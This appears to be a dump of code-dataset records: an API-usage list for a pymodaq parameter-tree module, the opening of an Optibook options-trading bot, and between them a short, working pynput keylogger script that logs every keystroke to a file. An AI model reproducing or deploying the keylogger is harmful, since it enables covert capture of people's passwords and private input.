"qtpy.QtGui.QPixmap", "line_number": 178, "usage_type": "attribute"}, {"api_name": "qtpy.QtGui", "line_number": 178, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTimeEdit", "line_number": 200, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 200, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 210, "usage_type": "call"}, {"api_name": "qtpy.QtCore.Slot", "line_number": 223, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QTime", "line_number": 223, "usage_type": "argument"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 228, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 228, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QVBoxLayout", "line_number": 260, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 260, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QSlider", "line_number": 261, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 261, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Qt.Horizontal", "line_number": 261, "usage_type": "attribute"}, {"api_name": "qtpy.QtCore.Qt", "line_number": 261, "usage_type": "name"}, {"api_name": "pymodaq.daq_utils.daq_utils.scroll_log", "line_number": 290, "usage_type": "call"}, {"api_name": "pymodaq.daq_utils.daq_utils.scroll_linear", "line_number": 292, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 326, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 326, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem.__init__", "line_number": 332, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 332, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 332, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QSize", "line_number": 377, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QCheckBox", "line_number": 385, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 385, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPushButton", "line_number": 392, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 392, "usage_type": "name"}, {"api_name": "pymodaq.daq_utils.gui_utils.widgets.QLED", "line_number": 407, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QLineEdit", "line_number": 415, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 415, "usage_type": "name"}, {"api_name": "pyqtgraph.widgets.ColorButton.ColorButton", "line_number": 421, "usage_type": "call"}, {"api_name": "pyqtgraph.widgets.ColorButton", "line_number": 421, "usage_type": "name"}, {"api_name": "pyqtgraph.widgets.GradientWidget.GradientWidget", "line_number": 431, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QDateTimeEdit", "line_number": 438, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 438, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QDateTime", "line_number": 438, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QDate.currentDate", "line_number": 438, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QDate", "line_number": 438, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QTime.currentTime", "line_number": 438, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QTime", "line_number": 438, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QDateEdit", "line_number": 448, "usage_type": "call"}, 
{"api_name": "qtpy.QtWidgets", "line_number": 448, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QDate", "line_number": 448, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QDate.currentDate", "line_number": 448, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QTime", "line_number": 459, "usage_type": "call"}, {"api_name": "qtpy.QtCore.QTime.currentTime", "line_number": 459, "usage_type": "call"}, {"api_name": "pymodaq.daq_utils.gui_utils.widgets.QLED", "line_number": 468, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QLabel", "line_number": 475, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 475, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.limitsChanged", "line_number": 490, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 490, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Qt.OtherFocusReason", "line_number": 504, "usage_type": "attribute"}, {"api_name": "qtpy.QtCore.Qt", "line_number": 504, "usage_type": "name"}, {"api_name": "pyqtgraph.widgets.SpinBox.SpinBox", "line_number": 505, "usage_type": "attribute"}, {"api_name": "pyqtgraph.widgets.SpinBox", "line_number": 505, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.optsChanged", "line_number": 537, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 537, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QCheckBox", "line_number": 541, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 541, "usage_type": "name"}, {"api_name": "pyqtgraph.widgets.ColorButton.ColorButton", "line_number": 541, "usage_type": "attribute"}, {"api_name": "pyqtgraph.widgets.ColorButton", "line_number": 541, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.valueChanged", "line_number": 565, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 565, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.SimpleParameter", "line_number": 579, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 579, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.SimpleParameter.__init__", "line_number": 583, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.SimpleParameter", "line_number": 583, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 583, "usage_type": "name"}, {"api_name": "pyqtgraph.functions", "line_number": 586, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QDateTime", "line_number": 594, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QDate", "line_number": 595, "usage_type": "name"}, {"api_name": "qtpy.QtCore.QTime", "line_number": 596, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLabel", "line_number": 599, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 599, "usage_type": "name"}, {"api_name": "pyqtgraph.functions", "line_number": 603, "usage_type": "call"}, {"api_name": "pyqtgraph.functions.mkColor", "line_number": 606, "usage_type": "call"}, {"api_name": "pyqtgraph.functions", "line_number": 606, "usage_type": "name"}, {"api_name": "pyqtgraph.colormap.ColorMap", "line_number": 609, "usage_type": "argument"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 629, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", 
"line_number": 630, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 631, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 632, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 633, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 634, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 635, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 636, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 637, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 638, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 639, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 640, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 643, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.ListParameterItem", "line_number": 645, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 645, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QInputDialog.getText", "line_number": 742, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QInputDialog", "line_number": 742, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 742, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLineEdit", "line_number": 743, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 743, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.optsChanged", "line_number": 764, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 764, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.ListParameter", "line_number": 772, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 772, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 781, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 794, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 797, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 797, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QHBoxLayout", "line_number": 810, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 810, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QComboBox", "line_number": 811, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 811, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPushButton", "line_number": 813, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 813, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 815, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 815, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 816, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 816, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 816, 
"usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem.__init__", "line_number": 830, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 830, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 830, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTreeWidgetItem", "line_number": 832, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 832, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTableWidget", "line_number": 879, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 879, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 888, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 888, "usage_type": "argument"}, {"api_name": "qtpy.QtWidgets.QTableWidget.__init__", "line_number": 891, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QTableWidget", "line_number": 891, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 891, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 902, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QTableWidgetItem", "line_number": 926, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 926, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Qt.ItemIsEditable", "line_number": 927, "usage_type": "attribute"}, {"api_name": "qtpy.QtCore.Qt", "line_number": 927, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTableWidgetItem", "line_number": 929, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 929, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTableWidgetItem", "line_number": 931, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 931, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Qt.ItemIsEditable", "line_number": 932, "usage_type": "attribute"}, {"api_name": "qtpy.QtCore.Qt", "line_number": 932, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 941, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 960, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem.__init__", "line_number": 965, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 965, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 965, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTreeWidgetItem", "line_number": 967, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 967, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.optsChanged", "line_number": 1028, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 1028, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QCheckBox", "line_number": 1032, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1032, "usage_type": "name"}, {"api_name": "pyqtgraph.widgets.ColorButton.ColorButton", "line_number": 1032, "usage_type": "attribute"}, {"api_name": "pyqtgraph.widgets.ColorButton", "line_number": 1032, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QStyledItemDelegate", "line_number": 1036, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1036, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTableView", 
"line_number": 1044, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1044, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1053, "usage_type": "call"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1054, "usage_type": "call"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1055, "usage_type": "call"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1056, "usage_type": "call"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1057, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QMenu", "line_number": 1065, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1065, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 1108, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1123, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem.__init__", "line_number": 1129, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 1129, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1129, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTreeWidgetItem", "line_number": 1131, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1131, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QAbstractItemView", "line_number": 1156, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1156, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QInputDialog.getText", "line_number": 1179, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QInputDialog", "line_number": 1179, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1179, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLineEdit", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1180, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.ParameterItem.optsChanged", "line_number": 1199, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.ParameterItem", "line_number": 1199, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 1205, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1205, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QHBoxLayout", "line_number": 1212, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1212, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPushButton", "line_number": 1214, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1214, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1216, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1216, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 1217, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1217, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1217, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets.QListWidget", "line_number": 1226, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1226, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QListWidget.__init__", "line_number": 1228, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QListWidget", "line_number": 1228, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1228, "usage_type": "name"}, {"api_name": 
"qtpy.QtWidgets.QApplication.processEvents", "line_number": 1267, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QApplication", "line_number": 1267, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1267, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 1273, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1284, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1294, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.ActionParameterItem", "line_number": 1297, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1297, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.ActionParameter", "line_number": 1308, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1308, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1313, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QTreeWidgetItem", "line_number": 1322, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1322, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 1365, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1365, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1377, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QFileDialog.getOpenFileName", "line_number": 1397, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QFileDialog", "line_number": 1397, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1397, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1397, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1397, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets.QFileDialog.getExistingDirectory", "line_number": 1399, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QFileDialog", "line_number": 1399, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1399, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QFileDialog.getSaveFileName", "line_number": 1402, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QFileDialog", "line_number": 1402, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1402, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1402, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1402, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 1418, "usage_type": "argument"}, {"api_name": "qtpy.QtWidgets.QHBoxLayout", "line_number": 1439, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1439, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPlainTextEdit", "line_number": 1440, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1440, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPushButton", "line_number": 1442, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1442, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1444, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1444, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 1445, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1445, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1445, "usage_type": 
"attribute"}, {"api_name": "qtpy.QtWidgets.QVBoxLayout", "line_number": 1449, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1449, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 1457, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1467, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 1470, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1470, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem.__init__", "line_number": 1473, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.WidgetParameterItem", "line_number": 1473, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1473, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QTreeWidgetItem", "line_number": 1475, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1475, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QInputDialog.getText", "line_number": 1511, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QInputDialog", "line_number": 1511, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1511, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QLineEdit", "line_number": 1512, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1512, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QWidget", "line_number": 1517, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets", "line_number": 1517, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1528, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets.QHBoxLayout", "line_number": 1571, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1571, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPlainTextEdit", "line_number": 1572, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1572, "usage_type": "name"}, {"api_name": "qtpy.QtWidgets.QPushButton", "line_number": 1576, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1576, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1578, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1578, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QPixmap", "line_number": 1579, "usage_type": "call"}, {"api_name": "qtpy.QtGui", "line_number": 1579, "usage_type": "name"}, {"api_name": "qtpy.QtGui.QIcon", "line_number": 1579, "usage_type": "attribute"}, {"api_name": "qtpy.QtWidgets.QVBoxLayout", "line_number": 1583, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1583, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 1591, "usage_type": "name"}, {"api_name": "qtpy.QtCore.Signal", "line_number": 1594, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1604, "usage_type": "call"}, {"api_name": "pyqtgraph.parametertree.parameterTypes.TextParameterItem", "line_number": 1607, "usage_type": "attribute"}, {"api_name": "pyqtgraph.parametertree.parameterTypes", "line_number": 1607, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter", "line_number": 1614, "usage_type": "name"}, {"api_name": "pyqtgraph.parametertree.Parameter.registerParameterType", "line_number": 1619, "usage_type": "call"}, 
{"api_name": "qtpy.QtWidgets.QApplication", "line_number": 1622, "usage_type": "call"}, {"api_name": "qtpy.QtWidgets", "line_number": 1622, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 1622, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 1626, "usage_type": "call"}]} +{"seq_id": "131309950", "text": "import pynput\n\nfrom pynput.keyboard import Key, Listener\n\ncount=0\nkeys=[]\n\ndef on_press(key):\n global count, keys\n keys.append(key)\n count=count+1\n if count>=10:\n count=0\n write_file(keys)\n keys=[]\n\n\ndef write_file(keys):\n with open(\"./log.txt\",\"a\") as f:\n for key in keys:\n k=str(key).replace(\"'\",\"\")\n if k.find(\"space\") > 0:\n f.write(\"\\n\")\n elif k.find(\"Key\") == -1:\n f.write(k)\n \n\ndef on_release(key):\n if key == Key.esc:\n return False\n\nwith Listener(on_press=on_press, on_release=on_release) as listener:\n listener.join()\n\n# this is a test program please enter your password : hello_world please enter your pincode : 5623456", "sub_path": "keylogger/keylogger_exe.py", "file_name": "keylogger_exe.py", "file_ext": "py", "file_size_in_byte": 684, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pynput.keyboard.Key.esc", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 29, "usage_type": "name"}, {"api_name": "pynput.keyboard.Listener", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "385806800", "text": "import datetime as dt\nimport time\nimport logging\nimport random\n\nfrom optibook.synchronous_client import Exchange\n\n\nfrom math import floor, ceil\nfrom black_scholes import call_value, put_value, call_delta, put_delta, call_vega, put_vega\nfrom libs import calculate_current_time_to_date\n\nexchange = Exchange()\nexchange.connect()\n\nlogging.getLogger('client').setLevel('ERROR')\n\nforce_delta_increase = False\nforce_delta_decrease = False\n\n\ndef limit_maker_man(strike, stock_value): \n maxx = 100\n if strike <= stock_value:\n ratio = strike / stock_value\n else:\n ratio = stock_value / strike\n return round(maxx * ratio,0)\n \n\ndef trade_would_breach_position_limit(instrument_id, volume, side, position_limit = 100):\n positions = exchange.get_positions()\n position_instrument = positions[instrument_id]\n\n if side == 'bid':\n return position_instrument + volume > position_limit\n elif side == 'ask':\n return position_instrument - volume < -position_limit\n else:\n raise Exception(f'''Invalid side provided: {side}, expecting 'bid' or 'ask'.''')\n\ndef round_down_to_tick(price, tick_size):\n \"\"\"\n Rounds a price down to the nearest tick, e.g. if the tick size is 0.10, a price of 0.97 will get rounded to 0.90.\n \"\"\"\n return floor(price / tick_size) * tick_size\n\n\ndef round_up_to_tick(price, tick_size):\n \"\"\"\n Rounds a price up to the nearest tick, e.g. 
if the tick size is 0.10, a price of 1.34 will get rounded to 1.40.\n    \"\"\"\n    return ceil(price / tick_size) * tick_size\n\n\ndef get_midpoint_value(instrument_id):\n    \"\"\"\n    This function calculates the current midpoint of the order book supplied by the exchange for the instrument\n    specified by <instrument_id>, returning None if either side or both sides do not have any orders available.\n    \"\"\"\n    order_book = exchange.get_last_price_book(instrument_id=instrument_id)\n\n    # If the instrument doesn't have prices at all or on either side, we cannot calculate a midpoint and return None\n    if not (order_book and order_book.bids and order_book.asks):\n        return None\n    else:\n        midpoint = (order_book.bids[0].price + order_book.asks[0].price) / 2.0\n        print(\"midpoint:\", midpoint)\n        return midpoint\n\n\ndef calculate_theoretical_option_value(expiry_date, strike, callput, stock_value, interest_rate, volatility):\n    \"\"\"\n    This function calculates the current fair call or put value based on Black & Scholes assumptions.\n\n    expiry_date: dt.date - Expiry date of the option\n    strike: float - Strike price of the option\n    callput: str - String 'call' or 'put' detailing what type of option this is\n    stock_value: float - Assumed stock value when calculating the Black-Scholes value\n    interest_rate: float - Assumed interest rate when calculating the Black-Scholes value\n    volatility: float - Assumed volatility of the stock when calculating the Black-Scholes value\n    \"\"\"\n    time_to_expiry = calculate_current_time_to_date(expiry_date)\n\n    if callput == 'call':\n        option_value = call_value(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n    elif callput == 'put':\n        option_value = put_value(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n    else:\n        raise Exception(f\"\"\"Got unexpected value for callput argument, should be 'call' or 'put' but was {callput}.\"\"\")\n\n    return option_value\n\n\ndef calculate_option_delta(expiry_date, strike, callput, stock_value, interest_rate, volatility):\n    \"\"\"\n    This function calculates the current option delta based on Black & Scholes assumptions.\n\n    expiry_date: dt.date - Expiry date of the option\n    strike: float - Strike price of the option\n    callput: str - String 'call' or 'put' detailing what type of option this is\n    stock_value: float - Assumed stock value when calculating the Black-Scholes value\n    interest_rate: float - Assumed interest rate when calculating the Black-Scholes value\n    volatility: float - Assumed volatility of the stock when calculating the Black-Scholes value\n    \"\"\"\n    time_to_expiry = calculate_current_time_to_date(expiry_date)\n\n    if callput == 'call':\n        option_value = call_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, sigma=volatility)\n    elif callput == 'put':\n        option_value = put_delta(S=stock_value, K=strike, T=time_to_expiry, r=interest_rate, 